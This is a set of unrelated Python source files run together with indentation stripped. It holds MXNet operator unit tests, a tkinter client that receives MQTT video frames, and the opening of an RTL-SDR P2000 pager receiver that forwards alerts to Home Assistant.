diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d input
x1 = np.random.randint(3,9)
x2 = np.random.randint(3,9)
x3 = np.random.randint(3,9)
x4 = np.random.randint(3,9)
a_np = np.random.random((x1, x2, x3, x4)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k = 0, axis1=0, axis2=1
r = mx.nd.diag(data=a, k=0, axis1=0, axis2=1)
assert_almost_equal(r.asnumpy(), np.diagonal(a_np, offset=0, axis1=0, axis2=1))
# k = 1, axis1=1, axis2=0
r = mx.nd.diag(data=a, k=1, axis1=1, axis2=0)
assert_almost_equal(r.asnumpy(), np.diagonal(a_np, offset=1, axis1=1, axis2=0))
# k = -1 axis1=1, axis3=3
r = mx.nd.diag(data=a, k=-1, axis1=1, axis2=3)
assert_almost_equal(r.asnumpy(), np.diagonal(a_np, offset=-1, axis1=1, axis2=3))
# k = 2, axis1=-2, axis2=0
r = mx.nd.diag(data=a, k=2, axis1=-2, axis2=0)
assert_almost_equal(r.asnumpy(), np.diagonal(a_np, offset=2, axis1=-2, axis2=0))
# Test 4d backward, k=0, axis1=3, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=0, axis1=3, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=1, axis1=1, axis2=2
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1, axis1=1, axis2=2)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-1, axis1=2, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1, axis1=2, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-2, axis1=1, axis2=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-2, axis1=1, axis2=-1)
check_numeric_gradient(diag_sym, [a_np])
@with_seed()
def test_depthtospace():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, blocksize, blocksize, c // (blocksize**2), h, w])
tmp = np.transpose(tmp, [0, 3, 4, 1, 5, 2])
y = np.reshape(tmp, [b, c // (blocksize**2), h * blocksize, w * blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
n = random.randint(1, 5)
c = block * block * rand_mul1
h = random.randint(1, 5)
w = random.randint(1, 5)
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.depth_to_space(data, block)
assert_almost_equal(output.asnumpy(), expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c // (block ** 2), h * block, w * block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.depth_to_space(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_depth_dim():
invalid_shape_inp = (n, block - 1, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_space_dim():
invalid_shape_inp = (n, block ** 2, 0, block + 1)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n , c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
test_invalid_depth_dim()
test_invalid_space_dim()
test_invalid_block_size()
@with_seed()
def test_spacetodepth():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, c, h // blocksize, blocksize, w // blocksize, blocksize])
tmp = np.transpose(tmp, [0, 3, 5, 1, 2, 4])
y = np.reshape(tmp, [b, c * (blocksize**2), h // blocksize, w // blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
rand_mul2 = random.randint(1, 4)
n = random.randint(1, 5)
c = random.randint(1, 5)
h = block * rand_mul1
w = block * rand_mul2
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.space_to_depth(data, block)
assert_almost_equal(output.asnumpy(), expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c * (block ** 2), h // block, w // block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.space_to_depth(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_space_dim():
invalid_shape_inp = (n , c, block - 1, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n, c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_depth_dim():
invalid_shape_inp = (n, 0, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
test_invalid_space_dim()
test_invalid_block_size()
test_invalid_depth_dim()
@with_seed()
def test_softmax_cross_entropy():
def f_sm_ce(data, label):
return np.sum(-np.log(data) * label)
data = mx.sym.Variable('data')
label = mx.sym.Variable('label')
sym = mx.sym.softmax_cross_entropy(data=data, label=label)
num_labels = random.randint(100, 200)
batch_size = random.randint(100, 200)
np_data = rand_ndarray((batch_size, num_labels), stype='default').asnumpy()
np_sm = np_softmax(np_data)
np_label = np.random.randint(0, num_labels, (batch_size, ))
np_one_hot_label = np.zeros((batch_size, num_labels))
np_one_hot_label[np.arange(batch_size), np_label] = 1.
check_symbolic_forward(sym, {'data' : np_data, 'label' : np_label}, [np.array([f_sm_ce(np_sm, np_one_hot_label)])], rtol=1e-3, atol=1e-5)
@with_seed()
def test_split_v2():
dim = random.randint(2, 6)
shape = rand_shape_nd(dim)
axis = random.randint(-dim, dim-1)
axis_size = shape[axis]
samples = random.randint(0, axis_size - 1)
indices = sorted(random.sample([i for i in range(1, axis_size)], samples))
indices = tuple(indices)
mx_data = rand_ndarray(shape)
np_data = mx_data.asnumpy()
np_out = np.split(np_data, indices_or_sections=indices, axis=axis)
data = mx.sym.Variable("data")
sym = mx.sym.split_v2(data, indices_or_sections=indices, axis=axis)
check_symbolic_forward(sym, {"data": mx_data}, np_out, rtol=1e-3, atol=1e-5)
out_grad = [np.ones(arr.shape) for arr in np_out]
check_symbolic_backward(sym, {"data": mx_data}, out_grad, [np.concatenate(out_grad, axis=axis)])
@with_seed()
def test_moments():
dim = random.randint(2, 5)
shape = rand_shape_nd(dim, dim=5)
axes = [i for i in range(dim)]
test_dims = random.sample(axes, random.randint(1, dim))
test_axes = tuple(sorted(test_dims))
np_a = np.random.uniform(-1.0, 1.0, shape)
a = mx.nd.array(np_a)
for keepdims in [True, False]:
eps = 1e-3
np_a[abs(np_a) < eps] = 2 * eps
np_mean = np.mean(np_a, axis=test_axes, keepdims=keepdims)
np_var = np.var(np_a, axis=test_axes, keepdims=keepdims)
mx_mean, mx_var = mx.nd.moments(a, keepdims=keepdims, axes=test_axes)
N = np_a.size / np_mean.size
mx_sym = mx.sym.Variable("data")
mx_moments = mx.sym.moments(mx_sym, axes=test_axes, keepdims=keepdims)
mx_test_sym = mx.sym.elemwise_add(mx_moments[0], mx_moments[1])
if len(np_mean.shape) == 0:
np_mean = np_mean.reshape(mx_mean.shape)
np_var = np_var.reshape(mx_var.shape)
assert np_mean.shape == mx_mean.shape
assert np_var.shape == mx_var.shape
check_symbolic_forward(mx_test_sym, [np_a], [np_mean + np_var], rtol=1e-3, atol=1e-5)
check_numeric_gradient(mx_test_sym, [np_a], numeric_eps=eps, rtol=1e-2, atol=2e-4)
@with_seed()
def test_invalid_kernel_size():
invalid_kernel_size = 28
assert_exception(
mx.nd.Correlation,
MXNetError,
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=invalid_kernel_size)
@with_seed()
def test_valid_kernel_size():
valid_kernel_size = 9
mx.nd.Correlation(
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=valid_kernel_size)
@with_seed()
def test_valid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
output_data=mx.nd.Pooling(
input_data,
kernel=kernel,
stride=stride,
pad=(0,0,0),
pool_type='max',
name='pooling',
pooling_convention="same")
assert(math.ceil(input_data.shape[2]/stride) == output_data.shape[2])
@with_seed()
def test_invalid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
pad = 2
assert_exception(
mx.nd.Pooling,
MXNetError,
input_data,
stride=stride,
kernel=kernel,
pad=pad,
pool_type='max',
name='pooling',
pooling_convention="same")
@with_seed()
def test_image_normalize():
# Part 1 - Test 3D input with 3D mean/std
shape_3d = (3, 28, 28)
mean = (0, 1, 2)
std = (3, 2, 1)
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][0] = data_expected_3d[:][:][0] / 3.0
data_expected_3d[:][:][1] = (data_expected_3d[:][:][1] - 1.0) / 2.0
data_expected_3d[:][:][2] = data_expected_3d[:][:][2] - 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][0] = 1 / 3.0
grad_expected_3d[:][:][1] = 1 / 2.0
grad_expected_3d[:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 2 - Test 4D input with 3D mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[0][:][:][0] = data_expected_4d[0][:][:][0] / 3.0
data_expected_4d[0][:][:][1] = (data_expected_4d[0][:][:][1] - 1.0) / 2.0
data_expected_4d[0][:][:][2] = data_expected_4d[0][:][:][2] - 2.0
data_expected_4d[1][:][:][0] = data_expected_4d[1][:][:][0] / 3.0
data_expected_4d[1][:][:][1] = (data_expected_4d[1][:][:][1] - 1.0) / 2.0
data_expected_4d[1][:][:][2] = data_expected_4d[1][:][:][2] - 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[0][:][:][0] = 1 / 3.0
grad_expected_4d[0][:][:][1] = 1 / 2.0
grad_expected_4d[0][:][:][2] = 1 / 1.0
grad_expected_4d[1][:][:][0] = 1 / 3.0
grad_expected_4d[1][:][:][1] = 1 / 2.0
grad_expected_4d[1][:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
# Part 3 - Test 3D input with scalar mean/std
shape_3d = (3, 28, 28)
mean = 1.0
std = 2.0
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][:] = (data_expected_3d[:][:][:] - 1.0) / 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 4 - Test 4D input with scalar mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[:][:][:][:] = (data_expected_4d[:][:][:][:] - 1.0) / 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[:][:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
@with_seed()
def test_index_array():
def test_index_array_default():
for shape in [(10,), (7, 5, 29), (5, 7, 11, 13, 17, 19)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_dim():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(())
expected = np.zeros((0,))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones((0, 0, 0))
expected = np.zeros((0, 0, 0, 3))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
def test_index_array_select_axes():
shape = (5, 7, 11, 13, 17, 19)
for axes in [(3,), (4, 1), (5, 1, 3), (-1,), (-5, -1, -3)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=axes)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)[..., axes]
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_select_axes_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=(2, 1))
input_array = np.ones((0, 0, 0, 0))
expected = np.zeros((0, 0, 2))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
test_index_array_default()
test_index_array_default_zero_dim()
test_index_array_default_zero_size()
test_index_array_select_axes()
test_index_array_select_axes_zero_size()
@with_seed()
def test_scalar_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=())
assertRaises(MXNetError, mx.nd.ones, shape=())
with mx.np_shape():
data_mx = mx.nd.ones(shape=())
data_np = np.ones((), dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
@with_seed()
def test_zero_size_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=(0, 1, 3, 0))
assertRaises(MXNetError, mx.nd.ones, shape=(0, 1, 3, 0))
with mx.np_shape():
data_mx = mx.nd.ones(shape=(0, 1, 0, 4))
data_np = np.ones(shape=data_mx.shape, dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
@with_seed()
def test_concat_with_zero_size_tensor():
with mx.np_shape():
data1 = mx.nd.ones((0, 8, 12))
data2 = mx.nd.ones((3, 8, 12))
data3 = mx.nd.ones((0, 8, 12))
ret = mx.nd.Concat(data1, data2, data3, dim=0)
assert ret.shape == (3, 8, 12)
data1 = mx.nd.ones((0, 3, 10))
data2 = mx.nd.ones((0, 4, 10))
data3 = mx.nd.ones((0, 5, 10))
ret = mx.nd.Concat(data1, data2, data3, dim=1)
assert ret.shape == (0, 12, 10)
@with_seed()
def test_np_shape_decorator():
@mx.use_np_shape
def check_scalar_one():
"""Generate scalar one tensor"""
return mx.nd.ones(shape=())
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
for active in [True, False]:
with mx.np_shape(active=active):
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
@mx.use_np_shape
def check_concat(shape1, shape2, axis):
data1 = mx.nd.ones(shape1)
data2 = mx.nd.ones(shape2)
ret = mx.nd.Concat(data1, data2, dim=axis)
expected_ret = np.concatenate((data1.asnumpy(), data2.asnumpy()), axis=axis)
assert ret.shape == expected_ret.shape
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
for active in [True, False]:
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
@with_seed()
def test_add_n():
data_shape = (2, 2)
input_num = 5
data = [mx.nd.random.uniform(shape=data_shape) for i in range(input_num)]
rslt = mx.nd.zeros(shape=data_shape)
for i in range(input_num):
rslt += data[i]
add_n_rslt = mx.nd.add_n(*data, out=data[0])
assert_almost_equal(rslt.asnumpy(), add_n_rslt.asnumpy(), atol=1e-5)
def test_get_all_registered_operators():
ops = get_all_registered_operators()
ok_(isinstance(ops, list))
ok_(len(ops) > 0)
ok_('Activation' in ops)
def test_get_operator_arguments():
operator_arguments = get_operator_arguments('Activation')
ok_(isinstance(operator_arguments, OperatorArguments))
ok_(operator_arguments.names == ['data', 'act_type'])
ok_(operator_arguments.types
== ['NDArray-or-Symbol', "{'relu', 'sigmoid', 'softrelu', 'softsign', 'tanh'}, required"])
ok_(operator_arguments.narg == 2)
def test_transpose_infer_shape_back():
o1 = mx.sym.ones(shape=[2,3])
o2 = mx.sym.ones(shape=[-1,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b.bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_transpose_infer_shape_mixed():
o1 = mx.sym.ones(shape=[2,-1])
o2 = mx.sym.ones(shape=[3,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b.bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
if __name__ == '__main__':
import nose
nose.runmodule()
|
stream_reciver.py
|
import time
import logging
import json
from tkinter.constants import NW
import tkinter as tk
import base64
import numpy as np
import cv2
from PIL import Image, ImageTk
from mqtt_client import MqttClient
from threading import Thread
FPS = 30
CHANNELS = 1
RATE = 44100
MQTT_BROKER = "mqtt.item.ntnu.no"
MQTT_PORT = 1883
MQTT_TOPIC_RECIVER = "ttm4115/team_1/project/reciver"
class StreamVideoReciver:
def __init__(self, name):
self.number = name[-1]
self.name = "office" + str(self.number) + "reciver"
self.active = False
self.framesaudio = []
self.recivefrom = None
# get sthe logger object for the component
self._logger = logging.getLogger(__name__)
print("logging under name {}.".format(__name__))
self._logger.info("Starting Component")
# create a new MQTT client
self._logger.debug("Connecting to MQTT broker {} at port {}".format(MQTT_BROKER, MQTT_PORT))
self.mqtt_client = MqttClient("StreamReciver" + self.name)
self.mqtt_client.on_connect = self.on_connect
self.mqtt_client.on_message = self.on_message
self.mqtt_client.connect(MQTT_BROKER, MQTT_PORT)
self.mqtt_client.subscribe(MQTT_TOPIC_RECIVER)
t1 = Thread(target=self.mqtt_client.loop_start())
t1.start()
# for tkinter
self.frame = None
self.started_stream = False
self.canvas = None
self.filter_frame = None
self.height = None
self.width = None
self.showing = False
def on_connect(self, client, userdata, flagSs, rc):
"""
Callback when connected to MQTT
"""
self._logger.debug("MQTT connected to {}".format(client))
def load_json(self, msg):
"""
Deserialize JSON string
"""
try:
data = json.loads(msg.payload.decode("utf-8"))
except Exception as err:
self._logger.error('Message sent to topic {} had no valid JSON. Message ignored. {}'.format(msg.topic, err))
return
return data
def on_message(self, client, userdata, msg):
"""
Callback when recieving message on subscribed topic through MQTT
"""
if msg.topic == 'ttm4115/team_1/project/reciver':
data = self.load_json(msg)
if data["command"] == "streamstart" and data["reciver"] == self.name:
self.recivefrom = data["answer"]
self.mqtt_client.subscribe("ttm4115/team_1/project/camera" + self.recivefrom[-1])
self.active = True
elif data["command"] == "streamstop" and data["reciver"] == self.name:
self.active = False
self.mqtt_client.unsubscribe("ttm4115/team_1/project/camera" + self.recivefrom[-1])
self.recivefrom = None
self.framesaudio = []
cv2.destroyAllWindows()
if self.recivefrom is not None:
if msg.topic == "ttm4115/team_1/project/camera" + self.recivefrom[-1]:
data = self.load_json(msg)
if data["command"] == "streamvideo" and data["reciver"] == self.name and self.active == True:
framevideo = self.bts_to_frame(data["answer"])
self.frame = framevideo
self.start_stream()
def bts_to_frame(self, b64_string):
"""
Converting Base 64 string to image frame
"""
base64_bytes = b64_string.encode("utf-8")
buff = np.frombuffer(base64.b64decode(base64_bytes), np.uint8)
img = cv2.imdecode(buff, cv2.IMREAD_COLOR)
return img
def set_canvas(self, canvas, height, width, gui_frame):
"""
Set the canvas, and the height and width
"""
self.canvas = canvas
self.height = height
self.width = width
self.gui_frame = gui_frame
def set_is_showing(self, is_showing):
"""
Function for setting menu is showing
"""
self.showing = is_showing
def start(self):
while True:
time.sleep(0.001)
def start_stream(self):
"""
Start the video stream
"""
if not self.started_stream:
self.started_stream = True
self.show_stream()
def show_stream(self):
"""
Show the stream to the screen
"""
frame = cv2.resize(self.frame, (self.width, self.height))
self.image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) # to RGB
self.image = Image.fromarray(self.image) # to PIL format
self.image = ImageTk.PhotoImage(self.image) # to ImageTk format
# Update image
if self.showing:
self.create_filter_page(self.gui_frame)
else:
if self.filter_frame is not None:
self.filter_frame.destroy()
self.filter_frame = None
self.canvas.create_image(0, 0, anchor=NW, image=self.image)
self.canvas.after(10, self.show_stream)
def create_filter_page(self, parent_frame: tk.Frame):
"""
Initializes the filter page
"""
filters = ['dog', 'glasses', 'easter', 'lofoten', 'vacation', ]
if self.filter_frame is None:
self.filter_frame = tk.Frame(parent_frame, bg='black')
self.filter_frame.place(x=self.width / 2, y=self.height / 8, anchor=tk.CENTER)
current = 'misc'
for index in range(len(filters)):
if current == filters[index]:
button1 = tk.Label(self.filter_frame, text=filters[index], bg='grey', fg='white',
font=("Helvetica", 40),
borderwidth=10, relief=tk.GROOVE, )
button1.grid(row=0, column=index, padx=10, pady=10)
else:
button1 = tk.Label(self.filter_frame, text=filters[index], bg='grey', fg='white',
font=("Helvetica", 40))
button1.grid(row=0, column=index, padx=10, pady=10)
|
p2000.py
|
#!/usr/bin/env python3
"""RTL-SDR P2000 Receiver for Home Assistant."""
# See README for installation instructions
import calendar
import configparser
import fnmatch
import json
import os
import re
import subprocess
import sys
import threading
import time
import logging
from datetime import datetime
from logging.handlers import TimedRotatingFileHandler as _TimedRotatingFileHandler
import paho.mqtt.client as mqtt
import requests
from opencage.geocoder import OpenCageGeocode, InvalidInputError, RateLimitExceededError, UnknownError
VERSION = "0.0.6"
class TimedRotatingFileHandler(_TimedRotatingFileHandler):
"""Override original code to fix bug with not deleting old logfiles."""
def __init__(self, filename="", when="midnight", interval=1, backupCount=7):
super().__init__(
filename=filename,
when=when,
interval=int(interval),
backupCount=int(backupCount),
)
def getFilesToDelete(self):
"""Find all logfiles present."""
dirname, basename = os.path.split(self.baseFilename)
filenames = os.listdir(dirname)
result = []
prefix = basename + "."
plen = len(prefix)
for filename in filenames:
if filename[:plen] == prefix:
suffix = filename[plen:]
if self.extMatch.match(suffix):
result.append(os.path.join(dirname, filename))
result.sort()
if len(result) < self.backupCount:
result = []
else:
result = result[: len(result) - self.backupCount]
return result
def doRollover(self):
"""Delete old logfiles but keep latest backupCount amount."""
super().doRollover()
self.close()
timetuple = time.localtime(time.time())
dfn = self.baseFilename + "." + time.strftime(self.suffix, timetuple)
if os.path.exists(dfn):
os.remove(dfn)
os.rename(self.baseFilename, dfn)
if self.backupCount > 0:
for oldlog in self.getFilesToDelete():
os.remove(oldlog)
self.stream = open(self.baseFilename, "w")
currenttime = int(time.time())
newrolloverat = self.computeRollover(currenttime)
while newrolloverat <= currenttime:
newrolloverat = newrolloverat + self.interval
self.rolloverAt = newrolloverat
class Logger:
"""Logger class."""
my_logger = None
def __init__(self, datadir, logstokeep, debug_enabled):
"""Logger init."""
self.my_logger = logging.getLogger()
if debug_enabled:
self.my_logger.setLevel(logging.DEBUG)
self.my_logger.propagate = False
else:
self.my_logger.setLevel(logging.INFO)
self.my_logger.propagate = False
date_fmt = "%Y-%m-%d %H:%M:%S"
formatter = logging.Formatter(
u"%(asctime)s - (%(threadName)-10s) - %(filename)s - %(levelname)s - %(message)s", date_fmt
)
console_formatter = logging.Formatter(
u"%(asctime)s - (%(threadName)-10s) - %(filename)s - %(levelname)s - %(message)s", date_fmt
)
# Create directory if not exists
if not os.path.exists(f"{datadir}/logs"):
os.makedirs(f"{datadir}/logs")
# Log to file and rotate if needed
file_handle = TimedRotatingFileHandler(
filename=f"{datadir}/logs/p2000.log", backupCount=logstokeep
)
# file_handle.setLevel(logging.DEBUG)
file_handle.setFormatter(formatter)
self.my_logger.addHandler(file_handle)
# Log to console
console_handle = logging.StreamHandler()
console_handle.setLevel(logging.INFO)
console_handle.setLevel(logging.DEBUG)
console_handle.setFormatter(console_formatter)
self.my_logger.addHandler(console_handle)
def log(self, message, level="info"):
"""Call the log levels."""
if level == "info":
self.my_logger.info(message)
elif level == "warning":
self.my_logger.warning(message)
elif level == "error":
self.my_logger.error(message)
elif level == "debug":
self.my_logger.debug(message)
def info(self, message):
"""Info level."""
self.log(message, "info")
def warning(self, message):
"""Warning level."""
self.log(message, "warning")
def error(self, message):
"""Error level."""
self.log(message, "error")
def debug(self, message):
"""Debug level."""
self.log(message, "debug")
class MessageItem:
"""Contains all the Message data."""
def __init__(self):
self.timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
self.message_raw = ""
self.timestamp = ""
self.timereceived = time.monotonic()
self.groupid = ""
self.receivers = ""
self.capcodes = []
self.body = ""
self.location = ""
self.postcode = ""
self.city = ""
self.address = ""
self.street = ""
self.region = ""
self.priority = 0
self.disciplines = ""
self.remarks = ""
self.longitude = ""
self.latitude = ""
self.opencage = ""
self.mapurl = ""
self.friendly_name = "P2000 SDR"
self.is_posted = False
def load_config(filename):
"""Create default or load existing config file."""
config = configparser.ConfigParser()
if config.read(filename):
return config
config["main"] = {"debug": False}
config["rtl-sdr"] = {
"cmd": "rtl_fm -f 169.65M -M fm -s 22050 | multimon-ng -a FLEX -t raw -"
}
config["home-assistant"] = {
"enabled": True,
"baseurl": "http://homeassistant.local:8123",
"token": "Place your Long-Lived Access Token here",
"sensorname": "p2000",
}
config["mqtt"] = {
"enabled": False,
"mqtt_server": "192.168.1.100",
"mqtt_port": 1883,
"mqtt_user": "mqttuser",
"mqtt_password": "somepassword",
"mqtt_topic": "p2000",
}
config["opencage"] = {
"enabled": False,
"token": "Place your OpenCage API Token here",
}
with open(cfgfile, "w") as configfile:
config.write(filename)
return False
def check_requirements(self):
"""Check if required software is installed."""
self.logger.info("Checking if required software is installed")
# Check if rtl_fm is installed
process = subprocess.Popen(
"rtl_fm", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
# Wait for the process to finish
dummy, err = process.communicate()
error_str = err.decode("utf8")
if "not found" in error_str or "not recognized" in error_str:
self.logger.debug("rtl_fm command not found, please install RTL-SDR software")
return False
self.logger.debug("rtl_fm is found")
# Check if multimon-ng is installed
process = subprocess.Popen(
"multimon-ng -h", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
# Wait for the process to finish
dummy, err = process.communicate()
error_str = err.decode("utf8")
if "not found" in error_str:
self.logger.error("multimon-ng not found, please install the multimon-ng package")
return False
self.logger.debug("multimon-ng is found")
return True
def load_capcodes_dict(self, filename):
"""Load capcodes to dictionary."""
capcodes = {}
try:
self.logger.info("Loading data from '{}'".format(filename))
with open(filename, "r") as csv_file:
csv_list = [
[val.strip() for val in r.split(",")] for r in csv_file.readlines()
]
(_, *header), *data = csv_list
for row in data:
key, *values = row
capcodes[key] = {key: value for key, value in zip(header, values)}
self.logger.info("{} records loaded".format(len(capcodes)))
except KeyError:
self.logger.error(f"Could not parse file contents of: {filename}")
except OSError:
self.logger.info(f"Could not open/read file: {filename}, ignoring filter")
return capcodes
def load_capcodes_filter_dict(self, filename):
"""Load capcodes ignore or match data to dictionary."""
capcodes = dict()
try:
self.logger.info("Loading data from '{}'".format(filename))
with open(filename, "r") as text_file:
lines = text_file.readlines()
for item in lines:
if item[0] == "#":
continue
fields = item.split(",")
if len(fields) == 2:
capcodes[fields[0].strip()] = fields[1].strip()
elif len(fields) == 1:
